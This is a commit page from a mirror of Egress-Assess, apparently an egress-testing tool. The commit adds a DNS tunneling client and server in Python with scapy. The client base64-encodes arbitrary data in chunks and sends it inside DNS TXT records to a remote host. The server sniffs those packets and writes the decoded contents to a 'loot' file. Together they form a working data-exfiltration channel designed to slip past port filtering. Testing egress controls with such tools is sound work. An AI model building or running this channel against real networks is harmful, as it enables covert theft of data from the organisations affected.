infosecn1nja
/
Egress-Assess
mirror of https://github.com/infosecn1nja/Egress-Assess.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added DNS tunneling

resolved_file
Chris Truncer 2015-01-13 10:17:40 -05:00
parent d51664aed6
commit 7bc76876b3
3 changed files with 132 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
Egress-Assess.py
View File

@ -6,6 +6,7 @@
# capabilities.
import logging
import sys
from common import helpers
from common import orchestra
@ -13,6 +14,8 @@ from common import orchestra
if __name__ == "__main__":
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
helpers.title_screen()
cli_parsed = helpers.cli_parser()

74
protocols/clients/dns_client.py Normal file
View File

@ -0,0 +1,74 @@
'''
This is a DNS client that transmits data within DNS TXT requests
Thanks to Raffi for his awesome blog posts on how this can be done
http://blog.cobaltstrike.com/2013/06/20/thatll-never-work-we-dont-allow-port-53-out/
'''
import base64
import re
import socket
import sys
from scapy.all import *
class Client:
def __init__(self, cli_object):
self.protocol = "dns"
self.length = 62
self.remote_server = cli_object.ip
def transmit(self, data_to_transmit):
byte_reader = 0
packet_number = 1
# Determine if sending via IP or domain name
if self.validate_ip(self.remote_server):
final_destination = self.remote_server
else:
print "[*] Resolving IP of domain..."
final_destination = socket.gethostbyname(self.remote_server)
while (byte_reader < len(data_to_transmit) + 35):
encoded_data = base64.b64encode(data_to_transmit[byte_reader:byte_reader + 35])
# calcalate total packets
if ((len(data_to_transmit) % 35) == 0):
total_packets = len(data_to_transmit) / 35
else:
total_packets = (len(data_to_transmit) / 35) + 1
print "[*] Packet Number/Total Packets: " + str(packet_number) + "/" + str(total_packets)
# Craft the packet with scapy
try:
send(IP(dst=final_destination)/UDP()/DNS(
id=15, opcode=0,
qd=[DNSQR(qname="egress-assess.com", qtype="TXT")], aa=1, qr=0,
an=[DNSRR(rrname=encoded_data, type="TXT", ttl=10)]),
verbose=False)
except KeyboardInterrupt:
print "[*] Shutting down..."
sys.exit()
# Increment counters
byte_reader += 35
packet_number += 1
return
def validate_ip(self, val_ip):
# This came from (Mult-line link for pep8 compliance)
# http://python-iptools.googlecode.com/svn-history/r4
# /trunk/iptools/__init__.py
ip_re = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}$')
if ip_re.match(val_ip):
quads = (int(q) for q in val_ip.split('.'))
for q in quads:
if q > 255:
return False
return True
return False

55
protocols/servers/dns_server.py Normal file
View File

@ -0,0 +1,55 @@
'''
This is a DNS Listening/server module that listens for requests, and
writes out data within TXT requests to a file
'''
import base64
import time
from common import helpers
from scapy.all import *
class Server:
def __init__(self, cli_object):
self.protocol = "dns"
self.last_packet = ''
self.file_name = ''
self.loot_path = ''
def customAction(self, packet):
if packet.haslayer(DNSRR):
dnsrr_strings = repr(packet[DNSRR])
try:
incoming_data = base64.b64decode(dnsrr_strings.split('\'')[1].rstrip('.'))
except TypeError:
pass
if incoming_data == self.last_packet:
pass
else:
with open(self.loot_path + self.file_name, 'a') as dns_out:
dns_out.write(incoming_data)
self.last_packet = incoming_data
return
def serve(self):
self.loot_path = os.path.join(helpers.ea_path(), "data") + "/"
# Check to make sure the agent directory exists, and a loot
# directory for the agent. If not, make them
if not os.path.isdir(self.loot_path):
os.makedirs(self.loot_path)
# Get the date info
current_date = time.strftime("%m/%d/%Y")
current_time = time.strftime("%H:%M:%S")
self.file_name = current_date.replace("/", "") +\
"_" + current_time.replace(":", "") + "text_data.txt"
print "[*] DNS server started!"
sniff(prn=self.customAction)
return